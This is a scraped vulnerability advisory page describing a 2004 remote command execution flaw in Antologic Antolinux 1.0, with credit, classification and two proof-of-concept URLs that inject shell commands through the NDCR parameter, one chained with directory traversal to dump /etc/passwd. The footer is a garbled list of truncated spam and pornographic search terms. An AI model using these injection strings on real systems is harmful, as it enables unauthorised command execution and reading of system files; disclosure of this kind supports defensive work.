about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability


Title Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
Published 2004-01-26-12:00AM
Updated 2004-01-26-07:42PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  The disclosure of this issue has been credited to Himeur Nourredine <lostnoobs@security-challenge.com>.
Vulnerable  Antologic Antolinux 1.0
Not Vulnerable  
Code   No exploit is required.

The following proof of concept examples have been supplied:
http://www.example.com/dns/ndcr.php?NDCR=anything;[arbritary commands]
http://www.example.com/libs/calendrier.php?lng=../../../../../../../../../home/web/ISA/htdocs/wmi/dns/ndcr&NDCR=foo ;cat /etc/passwd > lostnoobs.txt
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 09:17:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.pao-an www.zhongt blog.sina. I agree wi maxcpm.inf www.52hais gay sex vi kareena se nohelias v Hot sex Bollywood 2563 Nanci agra www.1000oa www.tcjob. Www.89.com WWW.SEXXX. www.tcjob. You Tube Www.89.com /modules/x kernel 2.4 maxcpm.inf My Friends explout sq Exploits S pictures s Sexy xxxl Pureftp news for c iredirecto www.eins.c in sex ve tamil actr www.onlytv Fucked xNxx%2B Nude aunti www.1000bj thirisa pa netscape b www.tcjob. AISHWARYA+ porn xxxl www.c1643. www.honghu sex1 vsapd osTicket-0 Janilya